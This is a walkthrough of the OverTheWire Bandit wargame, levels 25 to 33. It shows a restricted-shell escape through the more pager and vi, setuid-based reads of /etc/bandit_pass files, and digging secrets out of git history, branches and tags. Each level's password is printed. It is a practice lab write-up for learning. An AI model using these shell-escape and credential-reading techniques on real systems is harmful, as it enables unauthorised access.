Connection closed by 127.0.0.1 port 22
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

exec more ~/text.txt
exit 0

Shrink the terminal window, then run the following:

bandit25@bandit:~$ ssh -i bandit26.sshkey -p 2220 bandit26@bandit.labs.overthewire.org

Once the more pager is showing, press v to enter editing mode, then type :r /etc/bandit_pass/bandit26.

c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1

Level 26 → Level 27

Same technique as the previous level: shrink the window, enter the password and connect.

ssh -p 2220 bandit26@bandit.labs.overthewire.org

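When the more pager appears, press v to enter vi mode, then run the following commands in order to spawn a shell from vi (privilege escalation), and finally read the password.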

:set shell sh=/bin/sh
:sh
$ ls -al
total 44
drwxr-xr-x 3 root root 4096 Oct 5 06:19 .
drwxr-xr-x 70 root root 4096 Oct 5 06:20 ..
-rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
-rw-r--r-- 1 root root 807 Jan 6 2022 .profile
drwxr-xr-x 2 root root 4096 Oct 5 06:19 .ssh
-rwsr-x--- 1 bandit27 bandit26 14876 Oct 5 06:19 bandit27-do
-rw-r----- 1 bandit26 bandit26 258 Oct 5 06:19 text.txt
$ ./bandit27-do cat /etc/bandit_pass/bandit27
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS

Level 27 → Level 28

bandit27@bandit:~$ cd /tmp
bandit27@bandit:/tmp$ mkdir evo2
bandit27@bandit:/tmp$ cd evo2
bandit27@bandit:/tmp/evo2$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit27/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|


This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames

bandit27-git@localhost's password:
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/evo2$ ls
repo
bandit27@bandit:/tmp/evo2$ cd repo
bandit27@bandit:/tmp/evo2/repo$ ll
total 16
drwxrwxr-x 3 bandit27 bandit27 4096 Mar 25 09:08 ./
drwxrwxr-x 3 bandit27 bandit27 4096 Mar 25 09:07 ../
drwxrwxr-x 8 bandit27 bandit27 4096 Mar 25 09:08 .git/
-rw-rw-r-- 1 bandit27 bandit27 68 Mar 25 09:08 README
bandit27@bandit:/tmp/evo2/repo$ cat README
The password to the next level is: AVanL161y9rsbcJIsFHuw35rjaOM19nR

Level 28 → Level 29

bandit28@bandit:~$ cd /tmp
bandit28@bandit:/tmp$ mkdir evo128
bandit28@bandit:/tmp$ cd evo128
bandit28@bandit:/tmp/evo128$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit28/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|


This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames

bandit28-git@localhost's password:
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/evo128$ ls
repo
bandit28@bandit:/tmp/evo128$ cd repo
bandit28@bandit:/tmp/evo128/repo$ ll
total 16
drwxrwxr-x 3 bandit28 bandit28 4096 Mar 25 09:13 ./
drwxrwxr-x 3 bandit28 bandit28 4096 Mar 25 09:13 ../
drwxrwxr-x 8 bandit28 bandit28 4096 Mar 25 09:13 .git/
-rw-rw-r-- 1 bandit28 bandit28 111 Mar 25 09:13 README.md
bandit28@bandit:/tmp/evo128/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

bandit28@bandit:/tmp/evo128/repo$ git show
commit 14f754b3ba6531a2b89df6ccae6446e8969a41f3 (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Oct 5 06:19:41 2023 +0000

fix info leak

diff --git a/README.md b/README.md
index b302105..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials

- username: bandit29
-- password: tQKvmcwNYcFS6vmPHIUSI3ShmsrQZK8S
+- password: xxxxxxxxxx

Level 29 → Level 30

bandit29@bandit:~$ cd /tmp
bandit29@bandit:/tmp$ mkdir evo129
bandit29@bandit:/tmp$ cd evo129
bandit29@bandit:/tmp/evo129$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
bandit29@bandit:/tmp/evo129$ cd repo
bandit29@bandit:/tmp/evo129/repo$ ls
README.md
bandit29@bandit:/tmp/evo129/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

bandit29@bandit:/tmp/evo129/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/evo129/repo$ git checkout dev
Branch 'dev' set up to track remote branch 'dev' from 'origin'.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/evo129/repo$ ls
code README.md
bandit29@bandit:/tmp/evo129/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: xbhV3HpNGlTIdnjUrdAlPzc2L6y9EOnS


Level 30 → Level 31

bandit30@bandit:~$ cd /tmp
bandit30@bandit:/tmp$ mkdir evo130
bandit30@bandit:/tmp$ cd evo130
bandit30@bandit:/tmp/evo130$ git clone ssh://bandit30-git@localhost:2220/home/bandit30-git/repo
bandit30@bandit:/tmp/evo130$ ls
repo
bandit30@bandit:/tmp/evo130$ cd repo
bandit30@bandit:/tmp/evo130/repo$ ls
README.md
bandit30@bandit:/tmp/evo130/repo$ cat README.md
just an epmty file... muahaha
bandit30@bandit:/tmp/evo130/repo$ git show-ref
d39631d73f786269b895ae9a7b14760cbf40a99f refs/heads/master
d39631d73f786269b895ae9a7b14760cbf40a99f refs/remotes/origin/HEAD
d39631d73f786269b895ae9a7b14760cbf40a99f refs/remotes/origin/master
831aac2e2341f009e40e46392a4f5dd318483019 refs/tags/secret
bandit30@bandit:/tmp/evo130/repo$ git show 831a
OoffzGDlzhAlerFJ2cAiz1D41JW1Mhmt

Level 31 → Level 32

bandit31@bandit:~$ cd /tmp
bandit31@bandit:/tmp$ mkdir evo131
bandit31@bandit:/tmp$ cd evo131
bandit31@bandit:/tmp/evo131$ git clone ssh://bandit31-git@localhost:2220/home/bandit31-git/repo
bandit31@bandit:/tmp/evo131$ cd repo
bandit31@bandit:/tmp/evo131/repo$ ls
README.md
bandit31@bandit:/tmp/evo131/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
File name: key.txt
Content: 'May I come in?'
Branch: master

bandit31@bandit:/tmp/evo131/repo$ echo "May I come in?" > key.txt
bandit31@bandit:/tmp/evo131/repo$ git add -f key.txt
bandit31@bandit:/tmp/evo131/repo$ git status
On branch master
Your branch is up to date with 'origin/master'.

Changes to be committed:
(use "git restore --staged <file>..." to unstage)
new file: key.txt

bandit31@bandit:/tmp/evo131/repo$ git commit -m "key.txt"
[master 5d3806a] key.txt
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/evo131/repo$ git push origin master
kex_exchange_identification: Connection closed by remote host
Connection closed by 127.0.0.1 port 2220
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
bandit31@bandit:/tmp/evo131/repo$ git push origin master
......
remote: Well done! Here is the password for the next level:
remote: rmCBvG56y58BXzv98yZGdO7ATVL5dW8y
......

Level 32 → Level 33

WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
odHo63fHiFqcWWJG9rLiLDtPm45KzUKy

Level 33 → Level 34

At this moment, level 34 does not exist yet.